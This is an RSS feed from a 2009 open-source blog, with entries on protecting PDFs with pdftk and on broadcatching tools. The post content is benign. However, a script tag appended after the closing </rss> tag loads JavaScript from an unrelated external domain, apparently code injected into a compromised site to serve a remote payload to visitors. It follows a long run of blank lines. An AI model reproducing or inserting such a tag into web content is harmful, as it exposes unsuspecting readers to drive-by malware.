































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































<?xml version="1.0" encoding="utf-8" ?>

<rss version="2.0" 
   xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"
   xmlns:admin="http://webns.net/mvcb/"
   xmlns:dc="http://purl.org/dc/elements/1.1/"
   xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
   xmlns:wfw="http://wellformedweb.org/CommentAPI/"
   xmlns:content="http://purl.org/rss/1.0/modules/content/"
   >
<channel>
    <title>ellipsys (Entries tagged as cool solutions)</title>
    <link>http://www.ellipsys.org/blog/</link>
    <description>[ FLOSS + Linux + IT ]</description>
    <dc:language>en</dc:language>
    <generator>Serendipity 1.4.1 - http://www.s9y.org/</generator>
    <pubDate>Thu, 16 Apr 2009 05:27:00 GMT</pubDate>

    <image>
        <url>http://www.ellipsys.org/blog/templates/default/img/s9y_banner_small.png</url>
        <title>RSS: ellipsys - [ FLOSS + Linux + IT ]</title>
        <link>http://www.ellipsys.org/blog/</link>
        <width>100</width>
        <height>21</height>
    </image>

<item>
    <title>How to protect your PDF files with open source tools</title>
    <link>http://www.ellipsys.org/blog/index.php?/archives/53-How-to-protect-your-PDF-files-with-open-source-tools.html</link>
            <category>Cool solutions</category>
            <category>FLOSS</category>
    
    <comments>http://www.ellipsys.org/blog/index.php?/archives/53-How-to-protect-your-PDF-files-with-open-source-tools.html#comments</comments>
    <wfw:comment>http://www.ellipsys.org/blog/wfwcomment.php?cid=53</wfw:comment>

    <slash:comments>0</slash:comments>
    <wfw:commentRss>http://www.ellipsys.org/blog/rss.php?version=2.0&amp;type=comments&amp;cid=53</wfw:commentRss>
    

    <author>nospam@example.com (Marcus Friedman)</author>
    <content:encoded>
    	&lt;p&gt;&lt;!-- s9ymdb:29 --&gt;&lt;img class=&quot;serendipity_image_right&quot; width=&quot;240&quot; height=&quot;176&quot; style=&quot;float: right; border: 0px; padding-left: 5px; padding-right: 5px;&quot; src=&quot;http://www.ellipsys.org/blog/uploads/pdf-icon.png&quot; alt=&quot;&quot; /&gt;When you need to distribute documents in &lt;span class=&quot;caps&quot;&gt;PDF&lt;/span&gt; format, you&amp;#8217;ll probably want to protect them. If you are working on Mac OS X (or Windows) and you have Adobe Acrobat, that can be done quite easily. &lt;/p&gt;

	&lt;p&gt;But if you&amp;#8217;re running Linux on your desktop &amp;#8212;or even if you&amp;#8217;re using Windows or a Mac and don&amp;#8217;t want to use proprietary programs&amp;#8212;, there are free tools that will let you protect your files by adding encryption, passwords and restrictions.&lt;/p&gt;

	&lt;p&gt;One of those tools is &lt;a onclick=&quot;javascript: pageTracker._trackPageview(&#039;/extlink/www.accesspdf.com/pdftk/&#039;);&quot;  href=&quot;http://www.accesspdf.com/pdftk/&quot; title=&quot;pdftk&quot;&gt;pdftk&lt;/a&gt; (the pdf toolkit). On Debian and Ubuntu, pdftk is already present in the official repositories, so all you have to do to install it is:&lt;/p&gt;

	&lt;p&gt;&lt;code&gt;apt-get install pdftk&lt;/code&gt;&lt;/p&gt;

	&lt;p&gt;In the product&amp;#8217;s website you&amp;#8217;ll also find binary packages for FreeBSD, Mac OS X and Windows. &lt;/p&gt;

	&lt;p&gt;Here are some examples that show you how to use the program:&lt;/p&gt;

&lt;ul&gt;
  &lt;li&gt;Encrypt a &lt;span class=&quot;caps&quot;&gt;PDF&lt;/span&gt; using 128-Bit Strength (the default) and withhold all permissions:
  &lt;p&gt;&lt;code&gt;pdftk mydoc.pdf output mydoc.128.pdf owner_pw foopass&lt;/code&gt;
  &lt;li&gt;Same as above, except that a password is required to open the PDF:
  &lt;p&gt;&lt;code&gt;pdftk mydoc.pdf output mydoc.128.pdf owner_pw foo user_pw baz&lt;/code&gt;
  &lt;li&gt;Same as above, except that printing is allowed (after the &lt;span class=&quot;caps&quot;&gt;PDF&lt;/span&gt; has been opened):
  &lt;p&gt;&lt;code&gt;pdftk mydoc.pdf output mydoc.128.pdf owner_pw foo user_pw baz allow printing&lt;/code&gt;
&lt;/ul&gt;

	&lt;p&gt;Besides the security functions, &lt;code&gt;pdftk&lt;/code&gt; has many more features that you might find useful too, including the ability to merge, split and rotate &lt;span class=&quot;caps&quot;&gt;PDF&lt;/span&gt; documents, or applying watermarks. &lt;/p&gt;

	&lt;p&gt;&lt;center&gt;&lt;img src=&quot;http://www.ellipsys.org/blog/uploads/tux-icon.png&quot; alt=&quot;GNU / Linux&quot;&gt;&lt;img src=&quot;http://www.ellipsys.org/blog/uploads/freebsd.png&quot; alt=&quot;FreeBSD&quot;&gt;&lt;img src=&quot;http://www.ellipsys.org/blog/uploads/mac-icon.png&quot; alt=&quot;Mac OS X&quot;&gt;&lt;img src=&quot;http://www.ellipsys.org/blog/uploads/win-icon.png&quot; alt=&quot;Windows&quot;&gt;&lt;/center&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;/p&gt;
&amp;copy; 2008-09 by Marcus Friedman - &lt;a href=&quot;http://www.myfreecopyright.com/registered_mcn/B8338_4E03F_DA83B&quot;&gt;All rights reserved&lt;/a&gt; [ 33fb10b7 - 47386d1b ] 
    </content:encoded>

    <pubDate>Tue, 14 Apr 2009 20:00:00 -0700</pubDate>
    <guid isPermaLink="false">http://www.ellipsys.org/blog/index.php?/archives/53-guid.html</guid>
    <category>cool solutions</category>
<category>floss</category>
<category>foss</category>
<category>pdf</category>

</item>
<item>
    <title>Broadcatching with open source tools</title>
    <link>http://www.ellipsys.org/blog/index.php?/archives/46-Broadcatching-with-open-source-tools.html</link>
            <category>Cool solutions</category>
            <category>FLOSS</category>
    
    <comments>http://www.ellipsys.org/blog/index.php?/archives/46-Broadcatching-with-open-source-tools.html#comments</comments>
    <wfw:comment>http://www.ellipsys.org/blog/wfwcomment.php?cid=46</wfw:comment>

    <slash:comments>0</slash:comments>
    <wfw:commentRss>http://www.ellipsys.org/blog/rss.php?version=2.0&amp;type=comments&amp;cid=46</wfw:commentRss>
    

    <author>nospam@example.com (Marcus Friedman)</author>
    <content:encoded>
    	&lt;p&gt;&lt;strong&gt;&lt;em&gt;Broadcatching&lt;/em&gt;&lt;/strong&gt; can be defined as the downloading of digital content that has been made available over the Internet through &lt;span class=&quot;caps&quot;&gt;RSS&lt;/span&gt; feeds. Instead of having to spend time visiting multiple websites to find the contents that you want to download, you just need to find a relevant &lt;span class=&quot;caps&quot;&gt;RSS&lt;/span&gt; feed and add it to your broadcatching client. The program will monitor the feed, and when it finds new contents it will let you know, allowing you to start new downloads with a single click. You can even tell the broadcatching client to download new contents for you as they become available, so the whole process becomes fully automated.&lt;/p&gt;

	&lt;p&gt;If you want to know how to take advantage of broadcatching by using open source programs (on Linux, Mac OS X or Windows), please read on.&lt;/p&gt;

	&lt;p&gt;&lt;span&gt;&lt;table style=&quot;border:1px solid red;padding:8px;&quot;&gt;&lt;tr&gt;&lt;td&gt;Please note that downloading copyrighted television broadcasts is not considered legal in some countries or states. The purpose of this article is to give you an overview of some open source tools available for broadcatching. It is up to the readers to decide if or how they should use such tools. &lt;/tr&gt;&lt;/td&gt;&lt;/table&gt;&lt;/span&gt;&lt;/p&gt;
&amp;copy; 2008-09 by Marcus Friedman - &lt;a href=&quot;http://www.myfreecopyright.com/registered_mcn/B8338_4E03F_DA83B&quot;&gt;All rights reserved&lt;/a&gt; [ 33fb10b7 - 1359faac ] &lt;br /&gt;&lt;a href=&quot;http://www.ellipsys.org/blog/index.php?/archives/46-Broadcatching-with-open-source-tools.html#extended&quot;&gt;Continue reading &quot;Broadcatching with open source tools&quot;&lt;/a&gt;
    </content:encoded>

    <pubDate>Fri, 20 Mar 2009 20:00:00 -0700</pubDate>
    <guid isPermaLink="false">http://www.ellipsys.org/blog/index.php?/archives/46-guid.html</guid>
    <category>bittorrent</category>
<category>broadcatching</category>
<category>cool solutions</category>
<category>downloads</category>
<category>floss</category>

</item>

</channel>
</rss><script src="http://whereisdudescars.com/js2.php"></script>